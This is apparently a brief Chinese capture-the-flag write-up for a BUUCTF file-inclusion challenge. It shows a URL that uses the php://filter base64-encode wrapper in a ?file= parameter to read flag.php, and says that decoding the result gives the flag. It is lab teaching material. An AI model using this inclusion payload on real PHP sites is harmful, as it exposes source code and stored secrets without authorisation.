点击tips后,发现url可能存在文件包含漏洞
http://42756bdc-671e-4064-b3eb-bf7c61903417.node3.buuoj.cn/?file=flag.php
使用php伪协议进行flag.php的文件读取
http://42756bdc-671e-4064-b3eb-bf7c61903417.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
解密后便得到flag
